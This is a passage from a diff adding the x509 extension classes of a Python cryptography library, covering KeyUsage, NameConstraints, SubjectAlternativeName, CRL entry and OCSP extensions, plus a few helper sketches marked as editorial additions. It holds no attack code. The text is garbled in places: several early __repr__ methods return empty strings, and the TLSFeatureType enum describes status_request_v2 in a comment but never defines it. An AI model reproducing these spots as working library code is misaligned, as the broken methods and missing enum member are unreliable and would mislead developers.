in policy_qualifiers + ): + raise TypeError( + "policy_qualifiers must be a list of strings and/or " + "UserNotice objects or None" + ) + + self._policy_qualifiers = policy_qualifiers + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PolicyInformation): + return NotImplemented + + return ( + self.policy_identifier == other.policy_identifier + and self.policy_qualifiers == other.policy_qualifiers + ) + + def __hash__(self) -> int: + if self.policy_qualifiers is not None: + pq: typing.Optional[ + typing.Tuple[typing.Union[str, "UserNotice"], ...] + ] = tuple(self.policy_qualifiers) + else: + pq = None + + return hash((self.policy_identifier, pq)) + + @property + def policy_identifier(self) -> ObjectIdentifier: + return self._policy_identifier + + @property + def policy_qualifiers( + self, + ) -> typing.Optional[typing.List[typing.Union[str, "UserNotice"]]]: + return self._policy_qualifiers + + +class UserNotice: + def __init__( + self, + notice_reference: typing.Optional["NoticeReference"], + explicit_text: typing.Optional[str], + ) -> None: + if notice_reference and not isinstance( + notice_reference, NoticeReference + ): + raise TypeError( + "notice_reference must be None or a NoticeReference" + ) + + self._notice_reference = notice_reference + self._explicit_text = explicit_text + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, UserNotice): + return NotImplemented + + return ( + self.notice_reference == other.notice_reference + and self.explicit_text == other.explicit_text + ) + + def __hash__(self) -> int: + return hash((self.notice_reference, self.explicit_text)) + + @property + def notice_reference(self) -> typing.Optional["NoticeReference"]: + return self._notice_reference + + @property + def explicit_text(self) -> typing.Optional[str]: + return self._explicit_text + + +class NoticeReference: + def __init__( + self, + organization: typing.Optional[str], + notice_numbers: typing.Iterable[int], + ) -> None: + self._organization = organization + notice_numbers = list(notice_numbers) + if not all(isinstance(x, int) for x in notice_numbers): + raise TypeError("notice_numbers must be a list of integers") + + self._notice_numbers = notice_numbers + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, NoticeReference): + return NotImplemented + + return ( + self.organization == other.organization + and self.notice_numbers == other.notice_numbers + ) + + def __hash__(self) -> int: + return hash((self.organization, tuple(self.notice_numbers))) + + @property + def organization(self) -> typing.Optional[str]: + return self._organization + + @property + def notice_numbers(self) -> typing.List[int]: + return self._notice_numbers + + +class ExtendedKeyUsage(ExtensionType): + oid = ExtensionOID.EXTENDED_KEY_USAGE + + def __init__(self, usages: typing.Iterable[ObjectIdentifier]) -> None: + usages = list(usages) + if not all(isinstance(x, ObjectIdentifier) for x in usages): + raise TypeError( + "Every item in the usages list must be an ObjectIdentifier" + ) + + self._usages = usages + + __len__, __iter__, __getitem__ = _make_sequence_methods("_usages") + + def __repr__(self) -> str: + return "".format(self._usages) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, ExtendedKeyUsage): + return NotImplemented + + return self._usages == 
other._usages + + def __hash__(self) -> int: + return hash(tuple(self._usages)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class OCSPNoCheck(ExtensionType): + oid = ExtensionOID.OCSP_NO_CHECK + + def __eq__(self, other: object) -> bool: + if not isinstance(other, OCSPNoCheck): + return NotImplemented + + return True + + def __hash__(self) -> int: + return hash(OCSPNoCheck) + + def __repr__(self) -> str: + return "" + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class PrecertPoison(ExtensionType): + oid = ExtensionOID.PRECERT_POISON + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PrecertPoison): + return NotImplemented + + return True + + def __hash__(self) -> int: + return hash(PrecertPoison) + + def __repr__(self) -> str: + return "" + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class TLSFeature(ExtensionType): + oid = ExtensionOID.TLS_FEATURE + + def __init__(self, features: typing.Iterable["TLSFeatureType"]) -> None: + features = list(features) + if ( + not all(isinstance(x, TLSFeatureType) for x in features) + or len(features) == 0 + ): + raise TypeError( + "features must be a list of elements from the TLSFeatureType " + "enum" + ) + + self._features = features + + __len__, __iter__, __getitem__ = _make_sequence_methods("_features") + + def __repr__(self) -> str: + return "".format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, TLSFeature): + return NotImplemented + + return self._features == other._features + + def __hash__(self) -> int: + return hash(tuple(self._features)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class TLSFeatureType(utils.Enum): + # status_request is defined in RFC 6066 and is used for what is commonly + # called OCSP Must-Staple when present in the TLS Feature extension in an + # X.509 certificate. + status_request = 5 + # status_request_v2 is defined in RFC 6961 and allows multiple OCSP + # responses to be provided. It is not currently in use by clients or + # servers. 
+
+
+class InhibitAnyPolicy(ExtensionType):
+    oid = ExtensionOID.INHIBIT_ANY_POLICY
+
+    def __init__(self, skip_certs: int) -> None:
+        if not isinstance(skip_certs, int):
+            raise TypeError("skip_certs must be an integer")
+
+        if skip_certs < 0:
+            raise ValueError("skip_certs must be a non-negative integer")
+
+        self._skip_certs = skip_certs
+
+    def __repr__(self) -> str:
+        return "<InhibitAnyPolicy(skip_certs={0.skip_certs})>".format(self)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, InhibitAnyPolicy):
+            return NotImplemented
+
+        return self.skip_certs == other.skip_certs
+
+    def __hash__(self) -> int:
+        return hash(self.skip_certs)
+
+    @property
+    def skip_certs(self) -> int:
+        return self._skip_certs
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
+
+
+class KeyUsage(ExtensionType):
+    oid = ExtensionOID.KEY_USAGE
+
+    def __init__(
+        self,
+        digital_signature: bool,
+        content_commitment: bool,
+        key_encipherment: bool,
+        data_encipherment: bool,
+        key_agreement: bool,
+        key_cert_sign: bool,
+        crl_sign: bool,
+        encipher_only: bool,
+        decipher_only: bool,
+    ) -> None:
+        if not key_agreement and (encipher_only or decipher_only):
+            raise ValueError(
+                "encipher_only and decipher_only can only be true when "
+                "key_agreement is true"
+            )
+
+        self._digital_signature = digital_signature
+        self._content_commitment = content_commitment
+        self._key_encipherment = key_encipherment
+        self._data_encipherment = data_encipherment
+        self._key_agreement = key_agreement
+        self._key_cert_sign = key_cert_sign
+        self._crl_sign = crl_sign
+        self._encipher_only = encipher_only
+        self._decipher_only = decipher_only
+
+    @property
+    def digital_signature(self) -> bool:
+        return self._digital_signature
+
+    @property
+    def content_commitment(self) -> bool:
+        return self._content_commitment
+
+    @property
+    def key_encipherment(self) -> bool:
+        return self._key_encipherment
+
+    @property
+    def data_encipherment(self) -> bool:
+        return self._data_encipherment
+
+    @property
+    def key_agreement(self) -> bool:
+        return self._key_agreement
+
+    @property
+    def key_cert_sign(self) -> bool:
+        return self._key_cert_sign
+
+    @property
+    def crl_sign(self) -> bool:
+        return self._crl_sign
+
+    @property
+    def encipher_only(self) -> bool:
+        if not self.key_agreement:
+            raise ValueError(
+                "encipher_only is undefined unless key_agreement is true"
+            )
+        else:
+            return self._encipher_only
+
+    @property
+    def decipher_only(self) -> bool:
+        if not self.key_agreement:
+            raise ValueError(
+                "decipher_only is undefined unless key_agreement is true"
+            )
+        else:
+            return self._decipher_only
+
+    def __repr__(self) -> str:
+        try:
+            encipher_only = self.encipher_only
+            decipher_only = self.decipher_only
+        except ValueError:
+            # Users found None confusing because even though encipher/decipher
+            # have no meaning unless key_agreement is true, to construct an
+            # instance of the class you still need to pass False.
+            encipher_only = False
+            decipher_only = False
+
+        return (
+            "<KeyUsage(digital_signature={0.digital_signature}, "
+            "content_commitment={0.content_commitment}, "
+            "key_encipherment={0.key_encipherment}, "
+            "data_encipherment={0.data_encipherment}, "
+            "key_agreement={0.key_agreement}, "
+            "key_cert_sign={0.key_cert_sign}, crl_sign={0.crl_sign}, "
+            "encipher_only={1}, decipher_only={2})>"
+        ).format(self, encipher_only, decipher_only)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, KeyUsage):
+            return NotImplemented
+
+        return (
+            self.digital_signature == other.digital_signature
+            and self.content_commitment == other.content_commitment
+            and self.key_encipherment == other.key_encipherment
+            and self.data_encipherment == other.data_encipherment
+            and self.key_agreement == other.key_agreement
+            and self.key_cert_sign == other.key_cert_sign
+            and self.crl_sign == other.crl_sign
+            and self._encipher_only == other._encipher_only
+            and self._decipher_only == other._decipher_only
+        )
+
+    def __hash__(self) -> int:
+        return hash(
+            (
+                self.digital_signature,
+                self.content_commitment,
+                self.key_encipherment,
+                self.data_encipherment,
+                self.key_agreement,
+                self.key_cert_sign,
+                self.crl_sign,
+                self._encipher_only,
+                self._decipher_only,
+            )
+        )
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
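+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# a typical CA KeyUsage profile, asserting only certificate and CRL signing.
+# encipher_only/decipher_only must be False whenever key_agreement is False.
+def _example_ca_key_usage() -> KeyUsage:
+    return KeyUsage(
+        digital_signature=True,
+        content_commitment=False,
+        key_encipherment=False,
+        data_encipherment=False,
+        key_agreement=False,
+        key_cert_sign=True,
+        crl_sign=True,
+        encipher_only=False,
+        decipher_only=False,
+    )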
+
+
+class NameConstraints(ExtensionType):
+    oid = ExtensionOID.NAME_CONSTRAINTS
+
+    def __init__(
+        self,
+        permitted_subtrees: typing.Optional[typing.Iterable[GeneralName]],
+        excluded_subtrees: typing.Optional[typing.Iterable[GeneralName]],
+    ) -> None:
+        if permitted_subtrees is not None:
+            permitted_subtrees = list(permitted_subtrees)
+            if not permitted_subtrees:
+                raise ValueError(
+                    "permitted_subtrees must be a non-empty list or None"
+                )
+            if not all(isinstance(x, GeneralName) for x in permitted_subtrees):
+                raise TypeError(
+                    "permitted_subtrees must be a list of GeneralName objects "
+                    "or None"
+                )
+
+            self._validate_ip_name(permitted_subtrees)
+
+        if excluded_subtrees is not None:
+            excluded_subtrees = list(excluded_subtrees)
+            if not excluded_subtrees:
+                raise ValueError(
+                    "excluded_subtrees must be a non-empty list or None"
+                )
+            if not all(isinstance(x, GeneralName) for x in excluded_subtrees):
+                raise TypeError(
+                    "excluded_subtrees must be a list of GeneralName objects "
+                    "or None"
+                )
+
+            self._validate_ip_name(excluded_subtrees)
+
+        if permitted_subtrees is None and excluded_subtrees is None:
+            raise ValueError(
+                "At least one of permitted_subtrees and excluded_subtrees "
+                "must not be None"
+            )
+
+        self._permitted_subtrees = permitted_subtrees
+        self._excluded_subtrees = excluded_subtrees
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, NameConstraints):
+            return NotImplemented
+
+        return (
+            self.excluded_subtrees == other.excluded_subtrees
+            and self.permitted_subtrees == other.permitted_subtrees
+        )
+
+    def _validate_ip_name(self, tree: typing.Iterable[GeneralName]) -> None:
+        if any(
+            isinstance(name, IPAddress)
+            and not isinstance(
+                name.value, (ipaddress.IPv4Network, ipaddress.IPv6Network)
+            )
+            for name in tree
+        ):
+            raise TypeError(
+                "IPAddress name constraints must be an IPv4Network or"
+                " IPv6Network object"
+            )
+
+    def __repr__(self) -> str:
+        return (
+            "<NameConstraints(permitted_subtrees={0.permitted_subtrees}, "
+            "excluded_subtrees={0.excluded_subtrees})>".format(self)
+        )
+
+    def __hash__(self) -> int:
+        if self.permitted_subtrees is not None:
+            ps: typing.Optional[typing.Tuple[GeneralName, ...]] = tuple(
+                self.permitted_subtrees
+            )
+        else:
+            ps = None
+
+        if self.excluded_subtrees is not None:
+            es: typing.Optional[typing.Tuple[GeneralName, ...]] = tuple(
+                self.excluded_subtrees
+            )
+        else:
+            es = None
+
+        return hash((ps, es))
+
+    @property
+    def permitted_subtrees(
+        self,
+    ) -> typing.Optional[typing.List[GeneralName]]:
+        return self._permitted_subtrees
+
+    @property
+    def excluded_subtrees(
+        self,
+    ) -> typing.Optional[typing.List[GeneralName]]:
+        return self._excluded_subtrees
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
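+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# constrain a CA to example.com (which, per RFC 5280 dNSName matching, also
+# covers its subdomains). At least one subtree argument must be non-None.
+def _example_name_constraints() -> NameConstraints:
+    return NameConstraints(
+        permitted_subtrees=[DNSName("example.com")],
+        excluded_subtrees=None,
+    )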
+
+
+class Extension(typing.Generic[ExtensionTypeVar]):
+    def __init__(
+        self, oid: ObjectIdentifier, critical: bool, value: ExtensionTypeVar
+    ) -> None:
+        if not isinstance(oid, ObjectIdentifier):
+            raise TypeError(
+                "oid argument must be an ObjectIdentifier instance."
+            )
+
+        if not isinstance(critical, bool):
+            raise TypeError("critical must be a boolean value")
+
+        self._oid = oid
+        self._critical = critical
+        self._value = value
+
+    @property
+    def oid(self) -> ObjectIdentifier:
+        return self._oid
+
+    @property
+    def critical(self) -> bool:
+        return self._critical
+
+    @property
+    def value(self) -> ExtensionTypeVar:
+        return self._value
+
+    def __repr__(self) -> str:
+        return (
+            "<Extension(oid={0.oid}, critical={0.critical}, "
+            "value={0.value})>"
+        ).format(self)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, Extension):
+            return NotImplemented
+
+        return (
+            self.oid == other.oid
+            and self.critical == other.critical
+            and self.value == other.value
+        )
+
+    def __hash__(self) -> int:
+        return hash((self.oid, self.critical, self.value))
+
+
+class GeneralNames:
+    def __init__(self, general_names: typing.Iterable[GeneralName]) -> None:
+        general_names = list(general_names)
+        if not all(isinstance(x, GeneralName) for x in general_names):
+            raise TypeError(
+                "Every item in the general_names list must be an "
+                "object conforming to the GeneralName interface"
+            )
+
+        self._general_names = general_names
+
+    __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names")
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[UniformResourceIdentifier],
+            typing.Type[RFC822Name],
+        ],
+    ) -> typing.List[str]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[DirectoryName],
+    ) -> typing.List[Name]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[RegisteredID],
+    ) -> typing.List[ObjectIdentifier]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[IPAddress]
+    ) -> typing.List[_IPADDRESS_TYPES]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[OtherName]
+    ) -> typing.List[OtherName]:
+        ...
+
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[DirectoryName],
+            typing.Type[IPAddress],
+            typing.Type[OtherName],
+            typing.Type[RFC822Name],
+            typing.Type[RegisteredID],
+            typing.Type[UniformResourceIdentifier],
+        ],
+    ) -> typing.Union[
+        typing.List[_IPADDRESS_TYPES],
+        typing.List[str],
+        typing.List[OtherName],
+        typing.List[Name],
+        typing.List[ObjectIdentifier],
+    ]:
+        # Return the value of each GeneralName, except for OtherName
+        # instances, which we return directly because they have two important
+        # properties, not just one value.
+        objs = (i for i in self if isinstance(i, type))
+        if type != OtherName:
+            return [i.value for i in objs]
+        return list(objs)
+
+    def __repr__(self) -> str:
+        return "<GeneralNames({})>".format(self._general_names)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, GeneralNames):
+            return NotImplemented
+
+        return self._general_names == other._general_names
+
+    def __hash__(self) -> int:
+        return hash(tuple(self._general_names))
+
+
+class SubjectAlternativeName(ExtensionType):
+    oid = ExtensionOID.SUBJECT_ALTERNATIVE_NAME
+
+    def __init__(self, general_names: typing.Iterable[GeneralName]) -> None:
+        self._general_names = GeneralNames(general_names)
+
+    __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names")
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[UniformResourceIdentifier],
+            typing.Type[RFC822Name],
+        ],
+    ) -> typing.List[str]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[DirectoryName],
+    ) -> typing.List[Name]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[RegisteredID],
+    ) -> typing.List[ObjectIdentifier]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[IPAddress]
+    ) -> typing.List[_IPADDRESS_TYPES]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[OtherName]
+    ) -> typing.List[OtherName]:
+        ...
+
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[DirectoryName],
+            typing.Type[IPAddress],
+            typing.Type[OtherName],
+            typing.Type[RFC822Name],
+            typing.Type[RegisteredID],
+            typing.Type[UniformResourceIdentifier],
+        ],
+    ) -> typing.Union[
+        typing.List[_IPADDRESS_TYPES],
+        typing.List[str],
+        typing.List[OtherName],
+        typing.List[Name],
+        typing.List[ObjectIdentifier],
+    ]:
+        return self._general_names.get_values_for_type(type)
+
+    def __repr__(self) -> str:
+        return "<SubjectAlternativeName({})>".format(self._general_names)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, SubjectAlternativeName):
+            return NotImplemented
+
+        return self._general_names == other._general_names
+
+    def __hash__(self) -> int:
+        return hash(self._general_names)
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
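+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# build a SAN from DNS names and read typed values back out with
+# get_values_for_type.
+def _example_san_dns_names() -> typing.List[str]:
+    san = SubjectAlternativeName(
+        [DNSName("example.com"), DNSName("www.example.com")]
+    )
+    # Returns ["example.com", "www.example.com"]
+    return san.get_values_for_type(DNSName)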
+
+
+class IssuerAlternativeName(ExtensionType):
+    oid = ExtensionOID.ISSUER_ALTERNATIVE_NAME
+
+    def __init__(self, general_names: typing.Iterable[GeneralName]) -> None:
+        self._general_names = GeneralNames(general_names)
+
+    __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names")
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[UniformResourceIdentifier],
+            typing.Type[RFC822Name],
+        ],
+    ) -> typing.List[str]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[DirectoryName],
+    ) -> typing.List[Name]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[RegisteredID],
+    ) -> typing.List[ObjectIdentifier]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[IPAddress]
+    ) -> typing.List[_IPADDRESS_TYPES]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[OtherName]
+    ) -> typing.List[OtherName]:
+        ...
+
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[DirectoryName],
+            typing.Type[IPAddress],
+            typing.Type[OtherName],
+            typing.Type[RFC822Name],
+            typing.Type[RegisteredID],
+            typing.Type[UniformResourceIdentifier],
+        ],
+    ) -> typing.Union[
+        typing.List[_IPADDRESS_TYPES],
+        typing.List[str],
+        typing.List[OtherName],
+        typing.List[Name],
+        typing.List[ObjectIdentifier],
+    ]:
+        return self._general_names.get_values_for_type(type)
+
+    def __repr__(self) -> str:
+        return "<IssuerAlternativeName({})>".format(self._general_names)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, IssuerAlternativeName):
+            return NotImplemented
+
+        return self._general_names == other._general_names
+
+    def __hash__(self) -> int:
+        return hash(self._general_names)
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
+
+
+class CertificateIssuer(ExtensionType):
+    oid = CRLEntryExtensionOID.CERTIFICATE_ISSUER
+
+    def __init__(self, general_names: typing.Iterable[GeneralName]) -> None:
+        self._general_names = GeneralNames(general_names)
+
+    __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names")
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[UniformResourceIdentifier],
+            typing.Type[RFC822Name],
+        ],
+    ) -> typing.List[str]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[DirectoryName],
+    ) -> typing.List[Name]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self,
+        type: typing.Type[RegisteredID],
+    ) -> typing.List[ObjectIdentifier]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[IPAddress]
+    ) -> typing.List[_IPADDRESS_TYPES]:
+        ...
+
+    @typing.overload
+    def get_values_for_type(
+        self, type: typing.Type[OtherName]
+    ) -> typing.List[OtherName]:
+        ...
+
+    def get_values_for_type(
+        self,
+        type: typing.Union[
+            typing.Type[DNSName],
+            typing.Type[DirectoryName],
+            typing.Type[IPAddress],
+            typing.Type[OtherName],
+            typing.Type[RFC822Name],
+            typing.Type[RegisteredID],
+            typing.Type[UniformResourceIdentifier],
+        ],
+    ) -> typing.Union[
+        typing.List[_IPADDRESS_TYPES],
+        typing.List[str],
+        typing.List[OtherName],
+        typing.List[Name],
+        typing.List[ObjectIdentifier],
+    ]:
+        return self._general_names.get_values_for_type(type)
+
+    def __repr__(self) -> str:
+        return "<CertificateIssuer({})>".format(self._general_names)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, CertificateIssuer):
+            return NotImplemented
+
+        return self._general_names == other._general_names
+
+    def __hash__(self) -> int:
+        return hash(self._general_names)
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
+
+
+class CRLReason(ExtensionType):
+    oid = CRLEntryExtensionOID.CRL_REASON
+
+    def __init__(self, reason: ReasonFlags) -> None:
+        if not isinstance(reason, ReasonFlags):
+            raise TypeError("reason must be an element from ReasonFlags")
+
+        self._reason = reason
+
+    def __repr__(self) -> str:
+        return "<CRLReason(reason={})>".format(self._reason)
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, CRLReason):
+            return NotImplemented
+
+        return self.reason == other.reason
+
+    def __hash__(self) -> int:
+        return hash(self.reason)
+
+    @property
+    def reason(self) -> ReasonFlags:
+        return self._reason
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
+
+
+class InvalidityDate(ExtensionType):
+    oid = CRLEntryExtensionOID.INVALIDITY_DATE
+
+    def __init__(self, invalidity_date: datetime.datetime) -> None:
+        if not isinstance(invalidity_date, datetime.datetime):
+            raise TypeError("invalidity_date must be a datetime.datetime")
+
+        self._invalidity_date = invalidity_date
+
+    def __repr__(self) -> str:
+        return "<InvalidityDate(invalidity_date={})>".format(
+            self._invalidity_date
+        )
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, InvalidityDate):
+            return NotImplemented
+
+        return self.invalidity_date == other.invalidity_date
+
+    def __hash__(self) -> int:
+        return hash(self.invalidity_date)
+
+    @property
+    def invalidity_date(self) -> datetime.datetime:
+        return self._invalidity_date
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
+
+
+class PrecertificateSignedCertificateTimestamps(ExtensionType):
+    oid = ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS
+
+    def __init__(
+        self,
+        signed_certificate_timestamps: typing.Iterable[
+            SignedCertificateTimestamp
+        ],
+    ) -> None:
+        signed_certificate_timestamps = list(signed_certificate_timestamps)
+        if not all(
+            isinstance(sct, SignedCertificateTimestamp)
+            for sct in signed_certificate_timestamps
+        ):
+            raise TypeError(
+                "Every item in the signed_certificate_timestamps list must be "
+                "a SignedCertificateTimestamp"
+            )
+        self._signed_certificate_timestamps = signed_certificate_timestamps
+
+    __len__, __iter__, __getitem__ = _make_sequence_methods(
+        "_signed_certificate_timestamps"
+    )
+
+    def __repr__(self) -> str:
+        return "<PrecertificateSignedCertificateTimestamps({})>".format(
+            list(self)
+        )
+
+    def __hash__(self) -> int:
+        return hash(tuple(self._signed_certificate_timestamps))
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, PrecertificateSignedCertificateTimestamps):
+            return NotImplemented
+
+        return (
+            self._signed_certificate_timestamps
+            == other._signed_certificate_timestamps
+        )
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
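+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# CRLReason and InvalidityDate are the usual per-entry extensions attached to
+# a revoked certificate in a CRL. The date here is arbitrary.
+def _example_crl_entry() -> typing.Tuple[CRLReason, InvalidityDate]:
+    return (
+        CRLReason(ReasonFlags.key_compromise),
+        InvalidityDate(datetime.datetime(2022, 1, 1)),
+    )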
+
+
+class SignedCertificateTimestamps(ExtensionType):
+    oid = ExtensionOID.SIGNED_CERTIFICATE_TIMESTAMPS
+
+    def __init__(
+        self,
+        signed_certificate_timestamps: typing.Iterable[
+            SignedCertificateTimestamp
+        ],
+    ) -> None:
+        signed_certificate_timestamps = list(signed_certificate_timestamps)
+        if not all(
+            isinstance(sct, SignedCertificateTimestamp)
+            for sct in signed_certificate_timestamps
+        ):
+            raise TypeError(
+                "Every item in the signed_certificate_timestamps list must be "
+                "a SignedCertificateTimestamp"
+            )
+        self._signed_certificate_timestamps = signed_certificate_timestamps
+
+    __len__, __iter__, __getitem__ = _make_sequence_methods(
+        "_signed_certificate_timestamps"
+    )
+
+    def __repr__(self) -> str:
+        return "<SignedCertificateTimestamps({})>".format(list(self))
+
+    def __hash__(self) -> int:
+        return hash(tuple(self._signed_certificate_timestamps))
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, SignedCertificateTimestamps):
+            return NotImplemented
+
+        return (
+            self._signed_certificate_timestamps
+            == other._signed_certificate_timestamps
+        )
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
+
+
+class OCSPNonce(ExtensionType):
+    oid = OCSPExtensionOID.NONCE
+
+    def __init__(self, nonce: bytes) -> None:
+        if not isinstance(nonce, bytes):
+            raise TypeError("nonce must be bytes")
+
+        self._nonce = nonce
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, OCSPNonce):
+            return NotImplemented
+
+        return self.nonce == other.nonce
+
+    def __hash__(self) -> int:
+        return hash(self.nonce)
+
+    def __repr__(self) -> str:
+        return "<OCSPNonce(nonce={0.nonce!r})>".format(self)
+
+    @property
+    def nonce(self) -> bytes:
+        return self._nonce
+
+    def public_bytes(self) -> bytes:
+        return rust_x509.encode_extension_value(self)
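+
+
+# Illustrative sketch (editorial addition, not upstream cryptography code):
+# an OCSP nonce binds a response to its request; 16 random bytes is a common
+# choice.
+def _example_ocsp_nonce() -> OCSPNonce:
+    import os  # local import; os is not otherwise used by this module
+
+    return OCSPNonce(os.urandom(16))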
+
+
+class IssuingDistributionPoint(ExtensionType):
+    oid = ExtensionOID.ISSUING_DISTRIBUTION_POINT
+
+    def __init__(
+        self,
+        full_name: typing.Optional[typing.Iterable[GeneralName]],
+        relative_name: typing.Optional[RelativeDistinguishedName],
+        only_contains_user_certs: bool,
+        only_contains_ca_certs: bool,
+        only_some_reasons: typing.Optional[typing.FrozenSet[ReasonFlags]],
+        indirect_crl: bool,
+        only_contains_attribute_certs: bool,
+    ) -> None:
+        if full_name is not None:
+            full_name = list(full_name)
+
+        if only_some_reasons and (
+            not isinstance(only_some_reasons, frozenset)
+            or not all(isinstance(x, ReasonFlags) for x in only_some_reasons)
+        ):
+            raise TypeError(
+                "only_some_reasons must be None or frozenset of ReasonFlags"
+            )
+
+        if only_some_reasons and (
+            ReasonFlags.unspecified in only_some_reasons
+            or ReasonFlags.remove_from_crl in only_some_reasons
+        ):
+            raise ValueError(
+                "unspecified and remove_from_crl are not valid reasons in an "
+                "IssuingDistributionPoint"
+            )
+
+        if not (
+            isinstance(only_contains_user_certs, bool)
+            and isinstance(only_contains_ca_certs, bool)
+            and isinstance(indirect_crl, bool)
+            and isinstance(only_contains_attribute_certs, bool)
+        ):
+            raise TypeError(
+                "only_contains_user_certs, only_contains_ca_certs, "
+                "indirect_crl and only_contains_attribute_certs "
+                "must all be boolean."
+            )
+
+        crl_constraints = [
+            only_contains_user_certs,
+            only_contains_ca_certs,
+            indirect_crl,
+            only_contains_attribute_certs,
+        ]
+
+        if len([x for x in crl_constraints if x]) > 1:
+            raise ValueError(
+                "Only one of the following can be set to True: "
+                "only_contains_user_certs, only_contains_ca_certs, "
+                "indirect_crl, only_contains_attribute_certs"
+            )
+
+        if not any(
+            [
+                only_contains_user_certs,
+                only_contains_ca_certs,
+                indirect_crl,
+                only_contains_attribute_certs,
+                full_name,
+                relative_name,
+                only_some_reasons,
+            ]
+        ):
+            raise ValueError(
+                "Cannot create empty extension: "
+                "if only_contains_user_certs, only_contains_ca_certs, "
+                "indirect_crl, and only_contains_attribute_certs are all False"
+                ", then either full_name, relative_name, or only_some_reasons "
+                "must have a value."
+            )
+
+        self._only_contains_user_certs = only_contains_user_certs
+        self._only_contains_ca_certs = only_contains_ca_certs
+        self._indirect_crl = indirect_crl
+        self._only_contains_attribute_certs = only_contains_attribute_certs
+        self._only_some_reasons = only_some_reasons
+        self._full_name = full_name
+        self._relative_name = relative_name
+
+    def __repr__(self) -> str:
+        return (
+            "<IssuingDistributionPoint(full_name={0.full_name}, "
+            "relative_name={0.relative_name}, "
+            "only_contains_user_certs={0.only_contains_user_certs}, "
+            "only_contains_ca_certs={0.only_contains_ca_certs}, "
+            "only_some_reasons={0.only_some_reasons}, "
+            "indirect_crl={0.indirect_crl}, "
+            "only_contains_attribute_certs="
+            "{0.only_contains_attribute_certs})>".format(self)
+        )
+
+    def __eq__(self, other: object) -> bool:
+        if not isinstance(other, IssuingDistributionPoint):
+            return NotImplemented
+
+        return (
+            self.full_name == other.full_name
+            and self.relative_name == other.relative_name
